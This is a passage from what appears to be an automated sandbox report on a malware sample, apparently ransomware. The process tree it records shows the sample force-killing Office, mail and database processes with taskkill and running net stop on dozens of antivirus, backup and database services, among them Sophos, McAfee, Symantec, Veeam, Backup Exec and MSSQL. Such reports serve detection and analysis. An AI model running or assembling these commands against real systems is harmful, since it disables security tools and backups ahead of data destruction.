PID:2508

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM outlook.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2544

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2600

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2628

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2708

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2756

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2816

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2876

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM steam.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2924

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM synctime.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2944

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM thebat.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3028

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2108

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2272

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM visio.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2496

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM winword.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2764

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2956

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1404

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2060

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2288

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:556

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Acronis VSS Provider" /y
4⤵
PID:2184

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
5⤵
PID:1216

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Enterprise Client Service" /y
4⤵
PID:3056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Enterprise Client Service" /y
5⤵
PID:3044

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Agent" /y
4⤵
PID:984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Agent" /y
5⤵
PID:2692

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos AutoUpdate Service" /y
4⤵
PID:2144

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y
5⤵
PID:1100

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Clean Service" /y
4⤵
PID:988

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Clean Service" /y
5⤵
PID:2436

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Device Control Service" /y
4⤵
PID:2552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Device Control Service" /y
5⤵
PID:1348

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos File Scanner Service" /y
4⤵
PID:2784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y
5⤵
PID:996

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Health Service" /y
4⤵
PID:2212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Health Service" /y
5⤵
PID:2252

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos MCS Agent" /y
4⤵
PID:664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos MCS Agent" /y
5⤵
PID:2188

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos MCS Client" /y
4⤵
PID:2696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos MCS Client" /y
5⤵
PID:1108

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Message Router" /y
4⤵
PID:616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Message Router" /y
5⤵
PID:2080

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Safestore Service" /y
4⤵
PID:988

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Safestore Service" /y
5⤵
PID:2208

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos System Protection Service" /y
4⤵
PID:1764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos System Protection Service" /y
5⤵
PID:564

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Web Control Service" /y
4⤵
PID:2436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Web Control Service" /y
5⤵
PID:364

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "SQLsafe Backup Service" /y
4⤵
PID:1576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
5⤵
PID:2156

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "SQLsafe Filter Service" /y
4⤵
PID:2172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
5⤵
PID:1792

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Symantec System Recovery" /y
4⤵
PID:1604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec System Recovery" /y
5⤵
PID:2344

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Veeam Backup Catalog Data Service" /y
4⤵
PID:1768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
5⤵
PID:1348

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop AcronisAgent /y
4⤵
PID:2540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
5⤵
PID:2520

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop AcrSch2Svc /y
4⤵
PID:1100

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
5⤵
PID:2220

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop Antivirus /y
4⤵
PID:924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
5⤵
PID:1972

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecAgentAccelerator /y
4⤵
PID:2152

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
5⤵
PID:2316

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ARSM /y
4⤵
PID:2296

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ARSM /y
5⤵
PID:2368

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecAgentBrowser /y
4⤵
PID:2696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
5⤵
PID:2980

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecDeviceMediaService /y
4⤵
PID:2188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
5⤵
PID:2620

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecJobEngine /y
4⤵
PID:2312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
5⤵
PID:2720

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecManagementService /y
4⤵
PID:1216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
5⤵
PID:2712

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecVSSProvider /y
4⤵
PID:3020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
5⤵
PID:2392

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecRPCService /y
4⤵
PID:1472

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
5⤵
PID:2144

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop bedbg /y
4⤵
PID:2916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop bedbg /y
5⤵
PID:988

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop DCAgent /y
4⤵
PID:2816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
5⤵
PID:428

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EPUpdateService /y
4⤵
PID:2836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
5⤵
PID:2812

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EPSecurityService /y
4⤵
PID:2840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
5⤵
PID:2332

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EraserSvc11710 /y
4⤵
PID:2988

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
5⤵
PID:2428

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EsgShKernel /y
4⤵
PID:2172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
5⤵
PID:2548

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop FA_Scheduler /y
4⤵
PID:2152

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
5⤵
PID:2324

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop IISAdmin /y
4⤵
PID:796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
5⤵
PID:2436

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop IMAP4Svc /y
4⤵
PID:2744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IMAP4Svc /y
5⤵
PID:3028

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop macmnsvc /y
4⤵
PID:2948

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
5⤵
PID:2964

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop masvc /y
4⤵
PID:2528

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop masvc /y
5⤵
PID:2468

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MBAMService /y
4⤵
PID:2980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
5⤵
PID:2452

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MBEndpointAgent /y
4⤵
PID:960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
5⤵
PID:2772

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McAfeeEngineService /y
4⤵
PID:2312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
5⤵
PID:2248

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McAfeeFramework /y
4⤵
PID:2412

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
5⤵
PID:764

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y
4⤵
PID:2416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
5⤵
PID:3000

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McShield /y
4⤵
PID:2420

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McShield /y
5⤵
PID:428

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McTaskManager /y
4⤵
PID:2432

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
5⤵
PID:2392

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop mfemms /y
4⤵
PID:924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfemms /y
5⤵
PID:1100

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop mfevtp /y
4⤵
PID:2872

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
5⤵
PID:2868

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MMS /y
4⤵
PID:2208

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MMS /y
5⤵
PID:2128

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop mozyprobackup /y
4⤵
PID:2812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
5⤵
PID:2464

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MsDtsServer /y
4⤵
PID:2792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
5⤵
PID:3024

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MsDtsServer100 /y
4⤵
PID:1032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
5⤵
PID:1508

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MsDtsServer110 /y
4⤵
PID:3056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
5⤵
PID:2004

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeES /y
4⤵
PID:2516

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
5⤵
PID:2560

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeIS /y
4⤵
PID:2928

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
5⤵
PID:2896

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeMGMT /y
4⤵
PID:2972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
5⤵
PID:2588

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeMTA /y
4⤵
PID:2760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
5⤵
PID:2644

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeSA /y
4⤵
PID:832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
5⤵
PID:796

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeSRS /y
4⤵
PID:2776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
5⤵
PID:984

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y
4⤵
PID:2324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
5⤵
PID:1668

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y
4⤵
PID:2756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
5⤵
PID:1376

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSOLAP$TPS /y
4⤵
PID:2660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
5⤵
PID:2292

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y
4⤵
PID:2160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
5⤵
PID:2584

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y
4⤵
PID:956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
5⤵
PID:2012

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y
4⤵
PID:2612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
5⤵
PID:1652

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y
4⤵
PID:2512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
5⤵
PID:664

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y
4⤵
PID:2448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
5⤵
PID:2328

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y
4⤵
PID:1472

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
5⤵
PID:2672

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y
4⤵
PID:1540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
5⤵
PID:2800

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y
4⤵
PID:1404

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
5⤵
PID:2880

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y
4⤵
PID:1900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
5⤵
PID:2964

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y
4⤵
PID:2664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
5⤵
PID:2452

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$TPS /y
4⤵
PID:2852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
5⤵
PID:2280

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y
4⤵
PID:2364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
5⤵
PID:2380

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
4⤵
PID:1060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
5⤵
PID:2948

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y
4⤵
PID:960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
5⤵
PID:2240

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y
4⤵
PID:2620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher /y
5⤵
PID:764

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
4⤵
PID:3052

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
5⤵
PID:2640

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
4⤵
PID:2744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
5⤵
PID:2520

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
4⤵
PID:2788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
5⤵
PID:2000

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y
4⤵
PID:2264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
5⤵
PID:924

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
4⤵
PID:1288

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
5⤵
PID:1172

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y
4⤵
PID:2996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
5⤵
PID:2428

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y
4⤵
PID:2220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
5⤵
PID:2076

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLSERVER /y
4⤵
PID:1176

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
5⤵
PID:2320

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y
4⤵
PID:2748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
5⤵
PID:2072

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y
4⤵
PID:540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
5⤵
PID:2560

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MySQL80 /y
4⤵
PID:1256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
5⤵
PID:3024

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MySQL57 /y
4⤵
PID:564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
5⤵
PID:2360

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ntrtscan /y
4⤵
PID:1992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
5⤵
PID:2912

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop OracleClientCache80 /y
4⤵
PID:2692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
5⤵
PID:1604

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop PDVFSService /y
4⤵
PID:1104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
5⤵
PID:2896

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop POP3Svc /y
4⤵
PID:2832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
5⤵
PID:1876

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ReportServer /y
4⤵
PID:2760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
5⤵
PID:2260

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y
4⤵
PID:3032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
5⤵
PID:984

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y
4⤵
PID:832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
5⤵
PID:2344

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ReportServer$TPS /y
4⤵
PID:2608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
5⤵
PID:2104

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y
4⤵
PID:2784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
5⤵
PID:2648

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop RESvc /y
4⤵
PID:916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RESvc /y
5⤵
PID:2820

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop sacsvr /y
4⤵
PID:1576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
5⤵
PID:876

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SamSs /y
4⤵
PID:2288

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
5⤵
PID:2056

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SAVAdminService /y
4⤵
PID:928

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
5⤵
PID:3048

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SAVService /y
4⤵
PID:1624

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVService /y
5⤵
PID:2468

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SDRSVC /y
4⤵
PID:2656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
5⤵
PID:1072

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SepMasterService /y
4⤵
PID:2672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
5⤵
PID:1296

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ShMonitor /y
4⤵
PID:1472

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
5⤵
PID:1960

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop Smcinst /y
4⤵
PID:2448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
5⤵
PID:2920

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SmcService /y
4⤵
PID:1792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SmcService /y
5⤵
PID:2664

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SMTPSvc /y
4⤵
PID:2132

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
5⤵
PID:2640

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SNAC /y
4⤵
PID:2452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SNAC /y
5⤵
PID:2828

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SntpService /y
4⤵
PID:2632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SntpService /y
5⤵
PID:2396

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop sophossps /y
4⤵
PID:2280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophossps /y
5⤵
PID:764

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y
4⤵
PID:2364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
5⤵
PID:3052

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y
4⤵
PID:960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
5⤵
PID:2744

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y
